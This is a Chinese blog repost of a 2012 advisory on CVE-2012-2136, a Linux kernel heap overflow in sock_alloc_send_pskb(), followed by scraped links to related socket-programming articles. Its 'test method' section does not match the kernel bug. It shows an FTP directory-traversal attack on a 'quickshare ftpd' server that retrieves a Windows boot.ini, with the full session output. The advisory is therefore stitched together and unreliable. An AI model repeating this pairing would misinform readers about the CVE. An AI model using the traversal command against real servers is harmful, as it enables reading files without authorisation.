linux下send函数缓冲区问题,Linux Kernel 'sock_alloc_send_pskb()'函数堆缓冲区溢出漏洞...

最新推荐文章于 2021-05-14 02:39:02 发布
最新推荐文章于 2021-05-14 02:39:02 发布
阅读量241 收藏
点赞数
文章标签: linux下send函数缓冲区问题

发布日期:2012-05-29

更新日期:2012-05-30

受影响系统:

Linux kernel 2.6.x

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 53721

CVE ID: CVE-2012-2136

Linux Kernel是Linux操作系统的内核。

Linux kernel在设置已分配skb的frag之前没有验证sock_alloc_send_pskb()函数的data_len参数,在实现上存在堆缓冲区溢出漏洞,攻击者可利用此漏洞用超级用户权限执行任意代码,完全控制受影响计算机。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

www.linuxidc.com@linuxidc:~$ ftp 10.5.5.27

Connected to 10.5.5.27.

220 quickshare ftpd ready.

Name (10.5.5.27:modpr0be): ftpuser

331 User name okay, need password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get ../../../../../../../../boot.ini boot.ini

local: boot.ini remote: ../../../../../../../../boot.ini

200 PORT command successful. Consider using PASV.

150 Opening BINARY connection.

226 File send OK.

211 bytes received in 0.00 secs (127.0 kB/s)

ftp> quit

221 Goodbye.

www.linuxidc.com@linuxidc:~$ cat boot.ini

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin

/fastdetect

www.linuxidc.com@linuxidc:~$

# Eof

建议:

--------------------------------------------------------------------------------

厂商补丁:

Linux

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

二号方脑壳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux_sock_raw.rar_RAW_linux sock raw_原始套接字
09-20
Linux下的原始套接字(Raw Sockets)是网络编程中的一种高级接口,它允许程序员直接操作TCP/IP协议栈,而不受通常的协议处理过程限制。本资料“linux_sock_raw.rar”详细介绍了如何在Linux系统中使用原始套接字进行...
UDP协议之《传输队列长度sk_wmem_alloc统计》
C/C++编程指南
08-10 540
UDP协议之《传输队列长度sk_wmem_alloc统计》
udp socket connect一个不存在的地址后调用sendto返回111错误(connect refused)
yunlianglinfeng的专栏
01-17 6709
udp socket connect一个不存在的地址后调用sendto返回111错误(connect refused) udp socket 可以调用connect,这个就不说,不了解的可以网上查资料,下面直接说返回111错误的原因 udp socket 发送流程 sendto->sock_sendmsg->__sock_sendmsg->udp_sendmsg->ip_mak
UDP之收发内存管理
九天小哥的专栏
10-28 5964
文章目录整体策略变量说明UDP层面的控制变量sysctl_memsysctl_rmem/sysctl_wmemmemory_allocated初始化传输控制块层面的限制sk_rcv_buf/sk_sndbufsk_forward_allocsk_rmem_allocsk_wmem_alloc发送内存限制skb分配sock_alloc_send_pskb()sock_alloc_send_skb()sock_wmalloc()skb_set_owner_w()skb销毁: sock_wfree()小结接收内存
linux send 阻塞方式,关于sendsendto阻塞和非阻塞模式的底层细节
weixin_39640543的博客
05-14 1626
对于sendto,Linux 内核最后会调用udp_sendmsg,大概的调用栈是udp_sendmsgsecurity_socket_sendmsg__sock_sendmsgsock_sendmsgsendto在sento里面,会根据socket的模式把一个标志传递给内核:if (sock->file->f_flags & O_NONBLOCK)flags |= MSG_...
深度探索套接字缓冲区(2)
skiing_886的专栏
04-18 760
前面一篇文章分析了套接字缓冲区sk_buff的创建过程,但一般来讲,一个套接字缓冲区总是属于一个套接字,所以,除了调用sk_buff本身的alloc_skb函数创建一个套接字缓冲区,套接字本身还要对sk_buff进行一些操作,以及设置自身的一些成员值。下面我们来分析这个过程。     如果检查到待发送数据报没有传输层协议头(不是传输层的tcp或udp数据报),套接字创建缓冲区函数sock_a
udp_send.rar_UDP_UDP发送_linux udp send_udp_send
09-23
本教程将详细讲解如何使用C语言在Linux环境下编写UDP发送程序。 首先,我们需要包含必要的头文件,如`<stdio.h>`用于标准输入输出,`<stdlib.h>`用于内存管理,`<string.h>`处理字符串,以及网络编程相关的`...
Linux domain sockets 编程.rar_Sockets_linux_linux domain sock_sock
09-22
Linux域套接字(也称为Unix域套接字或本地域套接字)是进程间通信(IPC,Inter-Process Communication)的一种方式,特别适用于在同一台计算机上的不同进程之间进行高效的数据交换。与网络套接字(如TCP或UDP)不同...
SOCK_RAW_using_in_linux.rar_RAW_linux sock raw_raw sock_sock RAW
09-23
Linux操作系统中,SOCK_RAW是一种特殊的套接字类型,它允许程序员访问网络协议栈的底层,从而可以发送和接收原始的数据包,而不局限于特定的网络协议。这种类型的套接字通常用于创建自定义的网络协议,或者进行...
TCP_socket.zip_c linux socket_client.c_linux tcp client_socket_s
09-21
- 常量定义:如端口号、缓冲区大小等。 - 结构体定义:如自定义的网络地址结构体,方便处理IP和端口信息。 - 函数原型:自定义的辅助函数,如错误处理、日志记录或数据解析函数。 在实际编程中,为了确保程序的健壮...
SOCK_RAW-FOR-Linux.rar_RAW_SOCK_RAW perl_linux sock raw_sock_ra
09-24
Linux操作系统中,SOCK_RAW是一种特殊的套接字类型,它允许程序员访问网络协议栈的底层功能,从而能够实现自定义的网络协议或者获取原始数据包。本篇将深入探讨SOCK_RAW的工作原理及其在Perl语言中的应用。 一、...
hci_sock.rar_HCI_linux hci
09-24
标题中的“hci_sock.rar_HCI_linux hci”表明这是一个与Linux操作系统下的Bluetooth HCI(蓝牙主机控制接口)相关的压缩包,其中可能包含实现HCI协议的源代码文件。HCI是蓝牙通信的核心部分,它定义了主机(如计算机...
ntp.rar_c ntp_linux NTP_linux-ntp.rar_ntp_ntp linux
09-20
2. **新建socket**:在Linux中,通过调用`socket()`函数创建一个套接字,指定协议族(如AF_INET表示IPv4)和协议类型(如SOCK_DGRAM表示UDP,因为NTP使用的是无连接的UDP协议)。 3. **构建ntp协议包**:NTP协议...
l-sock.zip_linux socket_socket_socket linux_zip
09-14
标题中的“l-sock.zip_linux socket_socket_socket linux_zip”表明这是一个关于Linux系统中Socket编程的压缩文件,可能包含了多个文档或教程,通过“zip”格式进行打包。描述中提到的“LINUX Socket Programming”...
API_SOCKET.rar_API sock_API. socket_API_SOCKET_api socket_socket
09-24
"api_sock"、"api._socket"、"api_socket"和"api_socket socket_can_api"这些标签暗示了我们可能讨论的是Socket API的不同方面,包括基础功能和可能的CAN(Controller Area Network)协议支持。 首先,让我们深入...
alloc_skb()
shiniji_hh1126的专栏
12-01 1856
<br /> <br />sock_alloc_send_pskb() --> alloc_skb()<br /><br />    alloc_skb()用于分配缓冲区函数。由于"数据缓冲区"和"缓冲区的描述结构"(sk_buff结构)是两种不同的实体,这就意味着,在分配一个缓冲区时,需要分配两块内存(一个是缓冲区,一个是缓冲区的描述结构sk_buff)。<br /><br />/usr/src/linux-2.6.19/include/linux/skbuff.h<br />static inline
Socket CAN的理解(3)——【Socket CAN发送数据流程】
热门推荐
Wayne Woo的专栏
03-30 1万+
转载请注明出处:http://blog.csdn.net/Righthek 谢谢!     对于本文,我们将从用户层使用Socket CAN进行数据发送时,数据从用户空间到底层驱动的整个通信流程,用户层使用Socket CAN可参考上一篇文章《对Socket CAN的理解(2)——【Socket的原理及使用】》。     当我们在用户层通过socket进行CAN数据的发送时,需要进行以下操
linnux socket 缓冲区详解
u013525455的博客
07-21 855
转载出处:http://blog.chinaunix.net/uid-23146151-id-3125031.html 之前在前面的Linux socket缓冲区引起的死锁博客中讲述了这个具体的死锁过程。当时也没有很仔细的看Linux内部的实现代码,也没有具体看内部是如何实现的。这两天没事的时候看了两眼代码,找到了对应的实现方式。 为了说明后续的实现过程,首先需要介绍L
socket.send_fds()函数
最新发布
04-04
socket.send_fds()函数是一个用于发送文件描述符的函数。它是Python中socket模块中的一个方法,用于将指定的文件描述符发送到套接字的另一端。 该函数的语法如下: ```python socket.send_fds(fds) ``` 其中,fds...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值